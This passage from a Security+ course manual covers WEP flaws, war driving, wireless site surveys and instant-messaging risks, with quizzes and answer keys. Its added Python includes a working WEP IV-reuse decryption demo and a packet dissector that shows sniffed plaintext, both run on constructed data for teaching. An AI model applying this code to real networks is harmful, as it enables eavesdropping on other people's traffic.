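here; nothing was captured from a real WLAN.
"""
import math
import zlib

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 16,777,216 possible IVs


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4: key scheduling (KSA), then XOR data with the generated keystream (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: 3-byte IV in the clear, then RC4(IV || key) over data || CRC-32."""
    assert len(iv) == IV_BITS // 8
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + shared_key, plaintext + icv)


def wep_decrypt(shared_key: bytes, frame: bytes) -> bytes:
    """Receiver side: rebuild the per-frame key from the cleartext IV, check the ICV."""
    iv, body = frame[:3], frame[3:]
    clear = rc4(iv + shared_key, body)
    data, icv = clear[:-4], clear[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return data


def iv_collision_probability(frames: int) -> float:
    """Birthday bound: chance that two of `frames` randomly chosen IVs coincide."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * IV_SPACE))


def recover_via_iv_reuse(frame_known: bytes, known_plaintext: bytes, frame_target: bytes) -> bytes:
    """Decrypt frame_target without the key, given a frame with the same IV whose
    plaintext is known. Same IV + same shared key => identical RC4 keystream."""
    assert frame_known[:3] == frame_target[:3], "frames must share an IV"
    known_clear = known_plaintext + zlib.crc32(known_plaintext).to_bytes(4, "little")
    keystream = bytes(c ^ p for c, p in zip(frame_known[3:], known_clear))
    covered = bytes(c ^ k for c, k in zip(frame_target[3:], keystream))
    # Drop the target's own ICV if the keystream reached the end of the frame.
    return covered[:-4] if len(covered) == len(frame_target) - 3 else covered


def demo() -> dict:
    key = bytes.fromhex("0102030405")  # constructed 40-bit shared key
    iv = bytes.fromhex("0a0b0c")  # an IV the AP happens to reuse
    predictable = b"GET /index.html HTTP/1.0\r\n\r\n"  # constructed, guessable request
    secret = b"user=alice&pin=4321"  # constructed target frame
    f_known = wep_encrypt(key, iv, predictable)
    f_secret = wep_encrypt(key, iv, secret)
    return {
        "roundtrip_ok": wep_decrypt(key, f_known) == predictable,
        "iv_readable_in_clear": f_known[:3] == iv == f_secret[:3],
        "recovered_without_key": recover_via_iv_reuse(f_known, predictable, f_secret),
        "collision_after_5000_frames": iv_collision_probability(5000),
        "collision_after_10000_frames": iv_collision_probability(10000),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The recovery step never touches the shared key: the attacker only needs the cleartext IV to pair up frames and one guessable plaintext (a standard request header, a DHCP or ARP frame) to strip the keystream off everything else sent under that IV. The birthday figures show why "regular" reuse is guaranteed rather than unlucky: with random IVs, roughly half of all 5,000-frame captures already contain a repeat, and the FMS key-recovery attack needs far less traffic than that once weak IVs appear.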

Key sharing
Others have criticized WEP for not requiring asymmetric authentication in which each
wireless device would employ its own secret key. At this point, every wireless device in
a WLAN shares a common secret key, which means the likelihood of that key getting
into the hands of someone who wishes to harm the organization is increased.
For example, standard WEP requires the secret keys be manually configured. Rational
security implementation then dictates the secret key be changed on every device every
time someone leaves the company, if not more frequently, but this would be an
administrative nightmare in large organizations. A symmetric key system, in itself, does
not do anything to protect critical information from authorized WLAN members who
can, intentionally or unintentionally, gain access to resources to which they are not
authorized access. Another weakness related to the difficulty associated with rekeying is
that if it is not done regularly, hackers have even more time to break into the system.

War driving and other issues
In addition to the WEP-related problems that have been discussed so far, wireless LANs
have other security holes. For example, WLAN transmissions can, and often do, extend
beyond the confines of the physical structures of the organizations that use them. Unlike
wired LANs, they are therefore much easier for outsiders to detect and capture. Several
articles, in such widely read publications as PC Magazine and the Wall Street Journal,
describe the amount of information about an 802.11b WLAN that can be collected
through war driving.
War driving involves driving around using a laptop equipped with a wireless card and
an antenna. Craig Ellison wrote an article for PC Magazine in 2001 that described how
he was able to use this method to detect 61 APs within a six-block radius of the Ziff
Davis office in Manhattan. Of these, only 21% of the networks had actually enabled
WEP. The other 79% were broadcasting their transmissions out in plaintext for anyone
to pick up. On other war driving trips through Jersey City, Boston, and Silicon
Valley, Ellison easily found 808 networks and only 38% of them were using WEP.

                  In addition to war driving, which is a fairly passive activity, unauthorized users can
                  attach themselves to WLANs and use their resources, set up their own access points,
                  and jam the network in a denial-of-service attack, or use the previously mentioned WEP
                  weaknesses to break into wired LANs by attaching themselves to WLANs that are not
                  separated from the wired LAN by a DMZ. WEP authenticates clients, not users. Unless
                  an additional security method is employed, such as requiring users to provide
                  username/password sets, anyone who gains access to a client that has the shared key is
                  able to break into the system.
                  802.11i will help in this area, but perhaps the greatest need is in the area of educating
                  wireless network administrators and users about the inherent insecurity of wireless
                  systems and the need for additional care when using them.

                  WEP key
                  The 802.11 standard provides an optional Wired Equivalent Privacy (WEP)
                  specification for data encryption between wireless devices to increase privacy and
                  prevent eavesdropping. The access point and each station can have up to four shared
                  keys. Each key must correspond to the same key position in each of the other devices.

Do it!   C-1: Generating a WEP key (demonstration only)

          Instructor note: Introduce this activity as a demonstration. Students should observe
          only.

          1 In the Linksys utility, activate the Setup tab

          2 Under WEP, select Mandatory

          3 Click WEP Key Setting
            The WEP Key Setting window appears. This window allows you to set WEP
            encryption.

          4 Select 128Bit encryption. Leave the Mode set to HEX

          5 In the Passphrase field, enter Paganini1
            Each point in your wireless network MUST use the same WEP encryption method and
            encryption key, or else your wireless network will not function properly.

          6 Click Generate
            The system will generate four WEP encryption keys based on the passphrase.

          7 Click Apply
            To save the changes.

          8 Close the window
            To return to the Setup tab.

          9 Click Backup, then save the file to your local hard drive
            To store the Access Point configuration on your local PC. The backup holds the
            Access Point’s configuration, including the WEP keys, so protect the file as you
            would the keys themselves.

         10 Click Apply
            To complete the setup.

         11 At this point, you would configure each device in your wireless network with the
            same configuration and encryption keys
            Automated key generation from a passphrase can only be relied on when the network
            adapter is the same brand and model as the WAP, because different vendors derive
            keys from a passphrase differently. If not, you would need to manually enter the
            encryption keys in each wireless device.

         12 On the Setup window, select Disable under WEP
            To disable encryption.

         13 Click Apply

Do it!   C-2:   Understanding wired equivalent privacy
          Questions and answers
          1 Why is the initialization vector in WEP considered a security concern?
            • WEP sends the IV in plaintext across the WLAN, and it can be picked up by a hacker
                along the way
            • It is only 24 bits long
            • It creates weak keys
            • It is reused on a regular basis, allowing the hacker to see the pattern of reuse

          2 Describe war driving.

            This is the act of using a laptop and an antenna to locate wireless networks around town.

          3 WEP authenticates users, not clients. True or false?

            False: WEP authenticates clients.

                         Conducting a wireless site survey
Explanation              Conducting a wireless site survey is a critical part of designing and implementing a
                         wireless network. It involves understanding the number and requirements of the people
                         who will be served by the network and the physical environment in which the network
                         will be deployed. Preparing for and conducting a site survey allows you to discover how
                         many access points you will need and where they should be placed to provide adequate
                         coverage throughout the facility.
                         The basic steps to conduct a site survey are:
                            1 Conduct a needs assessment of the network users.
                            2 Obtain a copy of the site’s blueprint.
                            3 Do a walk-through of the site.
                            4 Identify possible access point locations.
                            5 Verify access point locations.
                            6 Document your findings.
                         The amount of time and energy this process takes depends on the size and shape of the
                         facility and the number and requirements of the users. A larger organization requires
                         more careful analysis of the site, and it might take days or even weeks to conduct a site
                         survey. A site survey of a smaller organization might only require a few hours.

                         Conducting a needs assessment of the network users
                         In this step, it’s important to gain an understanding of the number of people that the
                         WLAN will serve as well as their data access needs.
                         On the one hand, you might discover there are only a few people who will use the
                         WLAN and that they will not be heavy users of network resources. For example, a small
                         group of upper-level executives who only want to take their laptops with them when
                         they walk down the hall from their offices to the company boardroom.
                         On the other hand, you might discover that almost everyone in a large organization
                         needs to be able to move frequently from one place to another and that each employee is
                         a heavy user of network resources. This might be the case in an engineering firm in
                         which users are part of multiple project teams that need to work together for limited
                         periods of time and then move on to their next project with another group of people.
                         In either case, it’s important for you to understand both where the users will use their
                         wireless laptops or other devices and how much bandwidth they will need to perform
                         their jobs. It’s also important to know if there are any plans to dramatically increase or
                         decrease the number of mobile users.

                         Obtaining a copy of the site’s blueprints
                         Radio waves are difficult to predict. An initial understanding of the site’s physical
                         layout can give you an idea of how best to place access points so that adequate wireless
                         coverage is provided to mobile users. Like wired networks, wireless LANs also have
                         barriers to the ‘pathways’ that the radio signals can travel, and you need to know this so
                         you can work around the barriers.
                         One of the best ways to gain this understanding is to obtain a copy of the site’s
                         blueprints or, if none are available, create your own floor plan. In this step, you want to
                         notice the position of walls, walkways, elevator shafts, and the locations of any other
                         structural elements that might present challenges to adequate access point coverage.

Pay particular attention to materials used to construct the walls, floors, and ceilings of
the building. Certain materials tend to reflect or absorb part of the signal. Concrete,
marble, brick, water, and especially metal are difficult to work around.

Doing a walk-through of the site
After getting an idea of the layout of the site from the blueprints, it’s important that you
walk through the site to make sure the blueprints are accurate and to identify any other
barriers that might affect radio signals. For example, you might notice that partitions,
metal racks, or file cabinets have been placed in areas that originally appeared to be
wide open.
As you walk through the site, you need to identify other devices that operate in the same
radio frequency band as your WLAN, such as microwave ovens, medical equipment,
military communications equipment, and baby monitors. You also want to observe
whether or not there are existing wired network jacks and power outlets that you can use
to connect to the physical network and provide electricity to your access points.
You might need to determine in which areas of the building it might not be esthetically
pleasing to locate an access point and plan to make concessions for that space (such as
the company boardroom).

Identifying possible access point locations
Using the information you have gained in the preceding steps, you should be able to
approximate the locations of the access points that will provide adequate coverage for
mobile users. Areas that have high concentrations of mobile users require more access
points; however, access points placed too close together interfere with one another, so
you also need to keep adequate spacing between them.
You should also have noticed where physical network jacks and electrical sockets need
to be installed. Consider the power needs of the wireless workstations that will be in
each area and the different types of antennas that might be needed in different spaces.
Confirm that environmental conditions are good (not too hot or too cold).
Once all of this information has been taken into account, you need to create a draft
design of the network from which to work as you go through the next step.

Verifying access point locations
Before you finalize your network plans, you need to verify your initial approximations
of AP location are correct. To do this, you need the proper tools, including at least one
access point (and a power cord to connect it to a source of electricity), a laptop equipped
with a wireless NIC, and software that can be used to identify the AP and monitor data
rates, signal strength, and signal quality.
Most wireless equipment vendors include this software with the AP or the wireless NIC,
but you can also download free software from wireless LAN vendors, such as Cisco,
3Com, and Symbol. Some vendors provide you with software that not only tests your
signal strength, but also provides you with a printout of the results, which will be
helpful in your posttest documentation.

                  Once you have gathered all of the appropriate tools, you are ready to begin testing.
                     1 With your draft design in hand, go to each of the points that you have identified
                        as potential good locations for an AP, place the AP in those locations, and
                        monitor the site survey software to see what the results are as you walk around
                        the intended space.
                     2 You should also test for the amount of data throughput that is possible at various
                        points in the space.
                     3 Take detailed notes of these results and identify where you find strong and
                        weak signals.
                     4 If you are finding weak or dead spots, you need to reposition the AP until you
                        have full coverage of the space. In some cases, you might not find an ideal
                        location and will need to consider adding an additional access point in a location
                        to solve the problem.
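The readings gathered in steps 1 to 4 can be logged per survey point and evaluated automatically. The following Python is an added example, not part of the course and not any vendor's site-survey software. It assumes the readings were taken on a Linux laptop by copying /proc/net/wireless at each survey point (the snapshots below are constructed, no real building was surveyed), and the dBm thresholds that separate good, marginal and dead spots are rule-of-thumb assumptions that you should tune to your own data-rate requirements.

```python
"""Evaluate wireless site-survey readings taken at labelled points.

Added example, not course material. Each reading is the text of
/proc/net/wireless as reported by a Linux laptop at that survey point.
"""
import re

# Rule-of-thumb thresholds for the received signal level (assumptions, not
# from the course): at or above GOOD_DBM data rates hold up; between the two
# values the link works but throughput and reliability fall off; below
# MARGINAL_DBM treat the spot as dead.
GOOD_DBM = -67
MARGINAL_DBM = -75

# Constructed snapshots, one per survey point; no real building was surveyed.
# A snapshot may include the two header lines that the kernel prints.
SURVEY = {
    "lobby": (
        "Inter-| sta-|   Quality        |   Discarded packets               | Missed | WE\n"
        " face | tus | link level noise |  nwid  crypt   frag  retry   misc | beacon | 22\n"
        " wlan0: 0000   70.  -41.  -256        0      0      0      0      0        0\n"
    ),
    "boardroom": " wlan0: 0000   48.  -69.  -256        0      0      0      0      0        0\n",
    "east_wing": " wlan0: 0000   31.  -77.  -256        0      0      0      0      0        0\n",
    "file_room": " wlan0: 0000   22.  -84.  -256        0      0      0      0      0        0\n",
}

# iface: status quality. level. noise. ...   (the trailing dots are optional)
_DATA_LINE = re.compile(r"^\s*(\w+):\s+\S+\s+(-?\d+)\.?\s+(-?\d+)\.?\s+(-?\d+)\.?")


def parse_wireless(text):
    """Return {iface: (quality, level_dbm, noise_dbm)} from /proc/net/wireless text."""
    readings = {}
    for line in text.splitlines():
        m = _DATA_LINE.match(line)
        if m:                                   # header lines do not match
            iface, quality, level, noise = m.groups()
            readings[iface] = (int(quality), int(level), int(noise))
    if not readings:
        raise ValueError("no interface data line found")
    return readings


def classify(level_dbm):
    """Coverage verdict for one received signal level."""
    if level_dbm >= GOOD_DBM:
        return "good"
    if level_dbm >= MARGINAL_DBM:
        return "marginal"
    return "dead"


def analyze(survey, iface="wlan0"):
    """Per-point report: parsed readings plus a coverage verdict."""
    report = {}
    for point, text in survey.items():
        quality, level, noise = parse_wireless(text)[iface]
        report[point] = {
            "quality": quality,
            "level_dbm": level,
            "noise_dbm": None if noise == -256 else noise,  # -256: driver has no noise reading
            "status": classify(level),
        }
    return report


def needs_attention(report):
    """Survey points where the AP must be moved or a second AP added (step 4)."""
    return sorted(p for p, r in report.items() if r["status"] != "good")


if __name__ == "__main__":
    rep = analyze(SURVEY)
    for point, r in sorted(rep.items()):
        print(f"{point:10} level {r['level_dbm']:4} dBm  quality {r['quality']:3}  {r['status']}")
    print("reposition or add an AP for:", ", ".join(needs_attention(rep)))
```

The output of needs_attention() is the list you take back to step 4: reposition the AP and re-survey those points, or add a second AP where no single position covers them. Keep the raw snapshots with your drawings; they are the evidence behind the final plan.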

                  Documenting your findings
                  Now that you have tested your initial assumptions about AP locations and made any
                  adjustments that were necessary, you need to document your findings. Your final plan
                  will allow for adequate wireless coverage in any area that the users indicated they would
                  need it. Careful drawings should be made and a list of your assumptions should be
                  spelled out.
                  The people who will install the wireless system that you have designed will use your
                  documentation, as might the network administrators who will support the wireless
                  network. In addition, a great amount of time, energy, and money will be saved in the
                  future if the network needs to be upgraded or expanded, as long as your documentation
                  is precise and thorough.

Do it!                          C-3:   Performing a site survey (demonstration only)

Instructor notes: Introduce this activity as a demonstration; students should observe only.
For this activity, you will need a laptop with a Netgear MA401 PC Card installed. If the
Wireless Status icon is not displayed in the system tray, download and install the latest
version of the Netgear MA401 driver. If you have a different wireless network card, you can
right-click the wireless connection icon in the system tray and choose Status; the screens
will look different than those shown here, but will have similar information. Ask a student
to roam about the room and identify any objects that influence the signal strength and
quality.

                                 Here’s how                            Here’s why
                                 1 On the laptop computer, click the   A drop-down menu appears.
                                   Wireless Status icon

                                 2 Choose Wireless Network             The Status screen appears.
                                   Status…

                                 3 Monitor the following output:
                                   Current Tx Rate
                                   Signal Strength
                                   Link Quality

                                 4 Roam around the room with the
                                   laptop and watch for any changes
                                   in transmission rate, signal
                                   strength, and link quality

Do it!              C-4:      Reviewing the wireless site survey
                      Questions and answers
                       1 What are the steps needed to conduct a wireless site survey?

                          The basic steps to conduct a site survey are:
                          1 Conduct a needs assessment of the network users.
                          2 Obtain a copy of the site's blueprint.
                          3 Do a walk-through of the site.
                          4 Identify possible access point locations.
                          5 Verify access point locations.
                          6 Document your findings.

                       2 Why is it important to document your findings when conducting a wireless site
                         survey?

                          The documentation is important to communicate your findings in the wireless site survey.
                          The people who will install the wireless system that you have designed will use your
                          documentation, as will network administrators. It’s essential to have this information for
                          support purposes on the wireless network. In addition, a great amount of time, energy, and
                          money will be saved in the future if the network needs to be upgraded or expanded, as long
                          as your documentation is precise and thorough.

Do it!                         C-5:   Resetting the WAP (demonstration only)

Instructor note: Introduce this activity as a demonstration; students should observe only.
A factory reset also restores the access point’s default administrator password and clears
the SSID and WEP settings, so reconfigure the WAP immediately after the demonstration.

                                Here’s how                               Here’s why
                                1 In the Linksys utility, activate the
                                  Password tab

                                2 At Restore Factory Defaults, click
                                  on Yes

                                3 Click Apply                            To save the changes. The system warns that
                                                                         your connection might be lost.

                                4 Click Continue                         To proceed to reset the WAP to the factory
                                                                         defaults. Your connection will be terminated.

                                5 Close Internet Explorer


Topic D: Instant messaging
                     This topic covers the following CompTIA Security+ exam objective:

                      #      Objective

                      2.3    Recognize and understand the administration of the following Internet security concepts
                              • Instant messaging
                                  • Vulnerabilities
                                  • Packet Sniffing
                                  • Privacy




                     A definition of IM
Explanation          With the proliferation of instant messaging (IM) products comes an equal proliferation
                     of problems and security threats. Five currently available and frequently used flavors of
                     IM include: AOL Instant Messenger (AIM), MSN Messenger, Yahoo! Messenger, ICQ,
                     and Internet Relay Chat (IRC). Each of the five has suffered at least one major security
                     problem. In addition to the security problems inherent in each product, there is also a
                     series of generic problems that a technology manager faces when trying to lock down
                     IM.
                     Unlike e-mail, which uses a store and forward model, IM uses a real-time
                     communication model. When you type a message into an IM client and press the Enter
                     key, the text of that message is immediately sent to the client(s) to which you are
                     currently connected. This model makes IM easy, fast, and extremely dangerous.
                     IM networks operate in either peer-to-peer or peer-to-network configuration. In the
                     peer-to-peer model, client software communicates directly with one another; in the peer-
                     to-network model, client software logs onto a network, which then transfers the
                     messages between clients. Both models have pros and cons.
                     The peer-to-peer model does not rely on a central server; so as long as two client
                     software packages are not blocked, they can communicate with one another. This model
                     might cause the client to expose sensitive information such as the actual IP address of
                     the machine on which it is running.
                     The peer-to-network model relies on a central server (or group of servers) and,
                     therefore, there is a risk of a network outage making IM communication unavailable. In
                     addition, denial-of-service (DoS) attacks are becoming more frequent, and this increases
                     the likelihood that IM might not be available when you need it.

                     IM security issues
                     The instant messenger client is typically installed on an end-user’s workstation and
                     provides an interface for end-users to communicate with each other by utilizing the
                     server resources. The server manages and relays all end-user communication and is
                     typically maintained by a service provider such as AOL, Yahoo!, or Microsoft. The
                     server is also responsible for the authentication and notification of user status and
                     availability.

Instructor note: Ask students if they can think of some applications for IM within the
workplace. Answers might include helpdesk support, remote meetings, and file transfer.

                         Increased deployment of broadband networks, as well as the availability of extra
                         capacity in many networks, has made instant messaging tools a very popular way of
                         communicating both at home and in the workplace. The increased usage of these tools
                         also brings about certain vulnerabilities that many organizations fail to understand
                         and address. Many of these services, although very convenient, do not have the
                         security and encryption features that are essential for transporting sensitive and
                         confidential data.

                         There are serious security concerns regarding the usage of consumer IM systems
                         because these systems can transport sensitive and confidential data over public
                         networks in unencrypted form. Corporations have no control over data transported in
                         this fashion once it leaves the corporate network infrastructure. Enterprise IM
                         systems, on the other hand, are administered in-house, which lets an organization
                         make them considerably more secure than the consumer IM systems.
                         Most popular consumer IM systems share some common security risks that need to be
                         addressed:
                             • IM systems typically do nothing to stop the transfer of files that contain
                               viruses and Trojan horses. Such files can spread malware across the network and
                               cause systems to malfunction or cease to function altogether.
                             • Misconfigured file sharing can provide access to sensitive or confidential data
                               including personal data, company information, and system passwords.
                             • The most visible security risk associated with most IM systems is the lack of
                               encryption. These applications transfer data as plaintext (often HTML-formatted),
                               which can easily be intercepted by an intruder. Sensitive information should
                               always be encrypted and digitally signed before it is transported over a public
                               network. A plaintext session can also be hijacked, which can be further exploited
                               to obtain sensitive information.
                             • IM systems can be used to transport copyrighted material, which could have
                               substantial legal consequences. This includes copyrighted pictures, documents,
                               music files, software, and so forth.
                             • Transferring files also reveals the network addresses of the hosts involved, which
                               an attacker can use for malicious purposes such as a denial-of-service attack.
                         IM applications typically do not use well-known TCP ports for communication and file
                         transfers; instead, registered ports are used (Yahoo!’s file transfers on port 80 are
                         the exception):
                             • AOL Instant Messenger uses TCP port 5190 for file transfers and file sharing,
                               but transportation of IM images takes place on TCP port 4443.
                             • MSN Messenger (the .NET Messenger Service) uses TCP port 1863 for HTML-encoded
                               plaintext messages. Voice and video are relayed over a direct UDP connection on
                               ports 13324 and 13325. Application sharing takes place between clients over
                               TCP port 1503, and file transfers use TCP port 6891 on the initiating client.
                             • Yahoo!’s Messenger typically uses TCP port 5050 for server communication
                               and TCP port 80 for direct file transfers.
                             • ICQ messages are also unencrypted and sent via TCP port 3570, and voice and
                               video traffic uses UDP port 6701.

                  Safeguards
                  You can configure the firewall to filter some or all of these ports, either to restrict
                  particular functions of the corresponding IM applications or to prevent their use
                  altogether. It might be difficult to block an IM system such as Yahoo! Messenger by
                  port alone, because most of its traffic takes place over TCP port 80, the standard
                  port for regular web traffic. In situations like this, it is also possible to prevent
                  usage by denying access to certain domains because, for instance, Yahoo! Messenger
                  requires the user to log on to a specific subdomain. Intrusion detection systems (IDS)
                  can be deployed to monitor IM traffic, and an inline (intrusion prevention)
                  configuration can block it. You can have the IDS inspect all inbound and outbound
                  network activity and identify suspicious patterns that might indicate a network or
                  system attack by someone attempting to break into or compromise a system.

                  Lack of default encryption enables packet sniffing
                  One of the key problems facing any IM client is that all messages are passed in plaintext
                  format unless the user takes some specific step to enable encryption. This makes any IM
                  session extremely vulnerable to packet sniffing, especially if that IM session is
                  occurring over an unencrypted wireless connection.
                  There are a few solutions to this problem, including enabling private channel
                  communication, a step which turns on encryption in some IM products. Most notably,
                  Microsoft NetMeeting offers a secure connection option, which encrypts all traffic
                  between clients.
                  In addition, the Enterprise AIM product from AOL and a freeware IM client called Trillian
                  from a company called Cerulean Studios (www.ceruleanstudios.com) both use
                  encryption to protect message contents. Encryption solves only half the problem facing
                  IM; it does nothing to address the issue of social engineering.
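The port table and the Safeguards paragraph earlier in this topic describe filtering IM by port and by destination domain, and the passage above describes what an eavesdropper sees when those ports carry plaintext. The following Python is an added example, not code from the course or from any IM vendor. It constructs a few IPv4 packets (the message text and the hostname in them are made up), dissects them, matches the ports against the table, pulls the HTTP Host header out of the port-80 case that a port filter alone cannot decide, and returns the readable payload of any IM packet. Against real traffic you would feed dissect() the bytes of each IP packet taken from a raw socket or a capture file.

```python
"""Spot plaintext IM traffic in captured IPv4 packets (added example).

Not part of the course: a small dissector that builds constructed packets,
matches them against the IM port table from the text, and shows what an
eavesdropper on an unencrypted segment (for example an open WLAN) can read.
"""
import socket
import struct

# Port table from the course text. TCP port 80 is deliberately absent: Yahoo!
# file transfers share it with ordinary web browsing, so the port alone cannot
# identify them.
IM_TCP_PORTS = {
    5190: "AOL Instant Messenger: file transfer/file sharing",
    4443: "AOL Instant Messenger: images",
    1863: "MSN Messenger: messages",
    1503: "MSN Messenger: application sharing",
    6891: "MSN Messenger: file transfer",
    5050: "Yahoo! Messenger: server traffic",
    3570: "ICQ: messages",
}
IM_UDP_PORTS = {
    13324: "MSN Messenger: voice/video",
    13325: "MSN Messenger: voice/video",
    6701: "ICQ: voice/video",
}


def build_ipv4(src_ip, dst_ip, proto, l4):
    """Constructed IPv4 header (IHL 5, checksum left zero; enough for offline use)."""
    total = 20 + len(l4)
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, proto, 0,
                       socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + l4


def build_tcp(sport, dport, payload):
    """Minimal TCP header: data offset 5 (20 bytes), flags PSH+ACK, no options."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload


def build_udp(sport, dport, payload):
    """Minimal UDP header, checksum left zero."""
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


def http_host(payload):
    """Destination domain of an HTTP request; the input for domain-based blocking."""
    for line in payload.split(b"\r\n"):
        if line.lower().startswith(b"host:"):
            return line.split(b":", 1)[1].strip().decode("ascii", "replace")
    return None


def dissect(packet):
    """Parse one IPv4 packet and decide whether it looks like IM traffic."""
    ihl = (packet[0] & 0x0F) * 4                     # header length in bytes
    proto = packet[9]
    info = {"src": socket.inet_ntoa(packet[12:16]), "dst": socket.inet_ntoa(packet[16:20]),
            "proto": proto, "service": None, "verdict": "allow", "host": None}
    l4 = packet[ihl:]
    if proto == 6:                                   # TCP
        sport, dport = struct.unpack("!HH", l4[:4])
        payload = l4[(l4[12] >> 4) * 4:]             # skip header and any options
        table = IM_TCP_PORTS
    elif proto == 17:                                # UDP
        sport, dport = struct.unpack("!HH", l4[:4])
        payload = l4[8:]
        table = IM_UDP_PORTS
    else:
        return info
    info.update(sport=sport, dport=dport, payload=payload)
    info["service"] = table.get(dport) or table.get(sport)
    if info["service"]:
        info["verdict"] = "block"                    # a port filter is enough here
    elif proto == 6 and dport == 80:
        info["host"] = http_host(payload)
        info["verdict"] = "inspect"                  # only a domain decision can tell
    return info


def readable_text(info):
    """The sniffer's view: the payload of an unencrypted IM packet as text."""
    if not info["service"]:
        return None
    return info["payload"].decode("utf-8", "replace")


# Constructed sample traffic; no real session was captured and the hostname is fictional.
SAMPLE_MSG = (b"MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n"
              b"the Q3 numbers are on the finance share, password is the usual\r\n")
SAMPLE_HTTP = b"GET /upload HTTP/1.1\r\nHost: filetransfer.example.invalid\r\n\r\n"
CAPTURE = [
    build_ipv4("10.0.0.5", "192.0.2.10", 6, build_tcp(40000, 1863, SAMPLE_MSG)),
    build_ipv4("10.0.0.5", "192.0.2.20", 6, build_tcp(40001, 80, SAMPLE_HTTP)),
    build_ipv4("10.0.0.5", "192.0.2.30", 17, build_udp(40002, 13324, b"\x00" * 32)),
    build_ipv4("10.0.0.5", "192.0.2.40", 6, build_tcp(40003, 443, b"\x16\x03\x01")),
]


def scan(capture):
    """Dissect every packet in a capture."""
    return [dissect(p) for p in capture]


if __name__ == "__main__":
    for r in scan(CAPTURE):
        print(r["src"], "->", r["dst"], r.get("dport"), r["verdict"], r["service"] or r["host"] or "")
        if readable_text(r):
            print("   sniffed:", readable_text(r).strip().splitlines()[-1])
```

The verdicts map onto the safeguards: "block" is what a port filter can do on its own, "inspect" marks traffic where only a domain rule or an IDS signature can separate IM file transfers from ordinary web browsing, and readable_text() is the eavesdropper's view that a private channel in NetMeeting or an encrypting enterprise client would remove.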

                  Social engineering overcomes even encryption
                  Social engineering, the obtaining of sensitive data by social means such as pretending to
                  be someone who already has access, is on the rise and is particularly problematic when
                  it comes to IM.
                  IM uses traditional username/password authentication to verify someone’s identity,
                  which is only moderately secure. The ease of use that IM provides means that it is
                  possible for someone to gain access to an unguarded terminal and communicate with the
                  world as if they were the actual user of that terminal. In such a case, a “quick
                  question” asked of another employee at the company can easily result in a serious
                  security breach.
                  Unlike e-mail which gives the person being questioned time to decide whether to
                  respond, IM demands an almost immediate decision on the part of the person being
                  questioned. Add to the situation the informal nature of IM, and you have a real problem.

                  Technical issues surrounding IM
                  As IM has matured, more features have been added. Current clients allow file transfer,
                  voice, video, whiteboard technology, and the ability to help someone out by “taking
                  over” their desktops. These features each come with their own security issues, but this
                  unit only addresses the two most troublesome: file transfers and application sharing.

File transfers
The ability to send a file through IM is extremely powerful, but also very dangerous.
Unlike e-mail attachments, which can be scanned as they arrive on a corporate server,
IM attachments are much more difficult to handle and require an antivirus package on
the local machine receiving the attachment.

Application sharing
The ability to remotely control a computer can be a boon to help desk operators, but it
raises several issues. If the remote control software can be triggered by the remote site,
then a machine with IM software running might be taken over without anyone knowing
it. In addition, if the remote control software is being used by the remote site to connect
to a local site that has been physically breached, then all of the actions of the controlling
client might be seen by the wrong party.

Legal issues surrounding IM
Like e-mail, IM carries with it a possible threat of litigation or even criminal indictment
should the wrong message be sent or overheard by the wrong person. Corporations
spend millions each year to safeguard themselves from legal issues surrounding the
proper use of e-mail. Proper use chapters abound in employee handbooks, and some
businesses have even gone so far as to monitor the content of messages to ensure their
employees say nothing inappropriate.
IM is currently immune to most corporate efforts to control it. If a corporation allows
IM, then they are opening themselves up to a whole raft of legal problems. Unlike e-
mail, IM must be monitored in real time, as most IM clients do not keep a saved log of
messages unless the user expressly saves a dialog after a session.

Blocking IM
Blocking the use of IM at the perimeter is, in principle, a straightforward task: configure
the corporate firewall to block the ports that IM products use, and IM becomes unavailable to
your employees, because selective blocking of individual IM features is not practical at this
time. Two caveats apply in practice. Some clients (Yahoo! Messenger, as noted under
Safeguards) carry their traffic over TCP port 80, which you cannot block without cutting off
web access, so port filtering has to be combined with denying access to the service’s login
domains. And a perimeter filter does nothing about clients that are already installed and
talking peer-to-peer inside the network.
If your employees make a convincing case that IM is useful, then the best that can be done
is to write strong policies and limit IM clients to one or two vendors so you can maximize
control.

Cellular phone SMS
Short Message Service (SMS) is a quasi form of IM provided by most cell phone carriers. SMS
is extremely similar to IM in that messages are typed and sent immediately. The tracking of
inappropriate messages and the risk of having messages sniffed are both problems with SMS
technology.

Do it!              D-1:      Discussing instant messaging
                      Questions and answers
                       1 Which of the following is a function of a typical instant messaging application?
                         (Choose all that apply.)
                          A    File share
                          B    Compiler
                          C    Voice and video communication
                          D    Chat

                       2 Which of the following is false regarding IM applications?
                          A    These applications typically do not incorporate encryption mechanisms.
                          B    Misconfigured file sharing within IM applications can lead to unwanted
                               access to personal data.
                          C    IM applications have built-in mechanisms that prevent the spreading of
                               viruses.
                          D    None of the above.

                       3 Specify the TCP or UDP port used for each of the following applications.

                          AOL file transfers                               TCP port 5190

                          MSN Messenger messages                          TCP port 1863

                          MSN Messenger voice and video traffic           UDP ports 13324 and 13325

                          MSN Messenger file transfers                    TCP port 6891

                          Yahoo! Messenger file transfers                  TCP port 80

                          ICQ messages                                     TCP port 3570

                          ICQ voice and video traffic                      UDP port 6701

                       4 List three vulnerabilities associated with instant messaging.

                          Answers might include:
                          • IM uses real-time communications: transaction logging is optional.
                          • Messages are passed in plaintext format by default.
